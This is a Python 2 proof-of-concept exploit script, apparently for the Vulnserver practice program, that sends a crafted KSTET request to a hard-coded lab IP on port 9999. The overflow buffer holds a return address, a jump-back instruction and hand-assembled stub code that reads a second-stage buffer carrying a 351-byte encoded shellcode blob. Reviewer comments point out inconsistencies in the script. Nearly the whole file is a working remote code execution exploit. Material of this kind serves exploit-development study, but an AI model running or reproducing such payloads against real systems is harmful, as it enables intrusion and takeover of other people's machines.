#!/usr/bin/python
# Proof-of-concept client that connects to a hard-coded host/port, sends one
# crafted "KSTET" request followed (after a 2 s pause) by a second 512-byte
# buffer, and then closes the socket.
#
# NOTE(review): the script uses Python 2 syntax (`print` statements) and
# unconditionally targets a single hard-coded IP; there is no argument parsing,
# no timeout on the socket, and no error handling, so any failure before
# `s.close()` leaves the socket to be reclaimed by the interpreter.
import socket
from time import sleep
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` is always None and is never read.
connect=s.connect(('192.168.101.158',9999))
# PAYLOAD LENGTH IS : 4010 with 4000 of A
# NOTE(review): the line above does not match the buffer built below, which is
# 10 + 2 + 35 + 29 + 4 + 2 + 98 = 180 bytes before the trailing "\r\n".
# Location of recv ? : CALL 0040252C
buf = 'KSTET /.:/'
# [*] Exact match at offset 66
buf += "A"*2
# The next 35 bytes are the raw machine-code bytes described by the
# per-line mnemonics (kept from the original author's annotations).
buf += "\x54" # PUSH ESP
buf += "\x59" # POP ECX
buf += "\x66\x81\xC1\xCC\x05" # ADD CX,5CC
buf += "\x83\xEC\x50" # SUB ESP,50 VERY IMPORTANT TO PREVENT EIP OVERWRITE !
buf += "\x33\xD2" # XOR EDX,EDX
buf += "\x52" # PUSH EDX
buf += "\x80\xC6\x02" # ADD DH,2
buf += "\x52" # PUSH EDX
buf += "\x54" # PUSH ESP
buf += "\x5A" # POP EDX
# buf += "\x80\xEA\x14" # SUB DL,14 -- replaced by ADD EDX,50; the author left no explanation
buf += "\x83\xC2\x50" # ADD EDX, 50
buf += "\x52" # PUSH EDX
buf += "\xFF\x31" # PUSH DWORD PTR DS:[ECX]
buf += "\xB8\x11\x2C\x25\x40" # MOV EAX,40252C11
buf += "\xC1\xE8\x08" # SHR EAX,8
buf += "\xFF\xD0" # CALL EAX
# Padding: 66 - 2 ("A"*2 above) - 35 (the 16 encoded instructions above) = 29.
buf += "A"*(66-2-35)
# buf += "B"*4
# 625011AF JMP ESP
buf += "\xaf\x11\x50\x62"
buf += "\xEB\xBA" # Jump Back
buf += "C"*(100-2)
# Second-stage buffer: 20 NOP bytes, a 351-byte opaque blob, then NOP padding
# up to exactly 512 bytes (20 + 351 + 141).
shellcode = "\x90"*20
# Payload size: 351 bytes
shellcode += "\xda\xd2\xd9\x74\x24\xf4\x5f\x2b\xc9\xbb\x48\x9b\xb7"
shellcode += "\xf4\xb1\x52\x83\xef\xfc\x31\x5f\x13\x03\x17\x88\x55"
shellcode += "\x01\x5b\x46\x1b\xea\xa3\x97\x7c\x62\x46\xa6\xbc\x10"
shellcode += "\x03\x99\x0c\x52\x41\x16\xe6\x36\x71\xad\x8a\x9e\x76"
shellcode += "\x06\x20\xf9\xb9\x97\x19\x39\xd8\x1b\x60\x6e\x3a\x25"
shellcode += "\xab\x63\x3b\x62\xd6\x8e\x69\x3b\x9c\x3d\x9d\x48\xe8"
shellcode += "\xfd\x16\x02\xfc\x85\xcb\xd3\xff\xa4\x5a\x6f\xa6\x66"
shellcode += "\x5d\xbc\xd2\x2e\x45\xa1\xdf\xf9\xfe\x11\xab\xfb\xd6"
shellcode += "\x6b\x54\x57\x17\x44\xa7\xa9\x50\x63\x58\xdc\xa8\x97"
shellcode += "\xe5\xe7\x6f\xe5\x31\x6d\x6b\x4d\xb1\xd5\x57\x6f\x16"
shellcode += "\x83\x1c\x63\xd3\xc7\x7a\x60\xe2\x04\xf1\x9c\x6f\xab"
shellcode += "\xd5\x14\x2b\x88\xf1\x7d\xef\xb1\xa0\xdb\x5e\xcd\xb2"
shellcode += "\x83\x3f\x6b\xb9\x2e\x2b\x06\xe0\x26\x98\x2b\x1a\xb7"
shellcode += "\xb6\x3c\x69\x85\x19\x97\xe5\xa5\xd2\x31\xf2\xca\xc8"
shellcode += "\x86\x6c\x35\xf3\xf6\xa5\xf2\xa7\xa6\xdd\xd3\xc7\x2c"
shellcode += "\x1d\xdb\x1d\xe2\x4d\x73\xce\x43\x3d\x33\xbe\x2b\x57"
shellcode += "\xbc\xe1\x4c\x58\x16\x8a\xe7\xa3\xf1\x75\x5f\xcf\x33"
shellcode += "\x1e\xa2\x0f\x35\x65\x2b\xe9\x5f\x89\x7a\xa2\xf7\x30"
shellcode += "\x27\x38\x69\xbc\xfd\x45\xa9\x36\xf2\xba\x64\xbf\x7f"
shellcode += "\xa8\x11\x4f\xca\x92\xb4\x50\xe0\xba\x5b\xc2\x6f\x3a"
shellcode += "\x15\xff\x27\x6d\x72\x31\x3e\xfb\x6e\x68\xe8\x19\x73"
shellcode += "\xec\xd3\x99\xa8\xcd\xda\x20\x3c\x69\xf9\x32\xf8\x72"
shellcode += "\x45\x66\x54\x25\x13\xd0\x12\x9f\xd5\x8a\xcc\x4c\xbc"
shellcode += "\x5a\x88\xbe\x7f\x1c\x95\xea\x09\xc0\x24\x43\x4c\xff"
shellcode += "\x89\x03\x58\x78\xf4\xb3\xa7\x53\xbc\x9e\x9d\xb9\x9e"
shellcode += "\xb6\xbb\xa8\x9c\xda\x3b\x07\xe2\xe2\xbf\xad\x9b\x10"
shellcode += "\xdf\xc4\x9e\x5d\x67\x35\xd3\xce\x02\x39\x40\xee\x06"
shellcode += "\x90"*(512- 351-20)
# NOTE(review): the message says "TRUN" but the request built above starts with
# "KSTET"; the literal is left as-is here because it is runtime output.
print "Fuzzing TRUN with %s bytes" % len(buf)
# Read and echo the server's banner (up to 1024 bytes) before sending anything.
print s.recv(1024)
s.send(buf + '\r\n')
# Fixed 2 s delay between the two sends; nothing checks the first send succeeded.
sleep(2)
s.send(shellcode)
#print s.recv(1024)
s.close()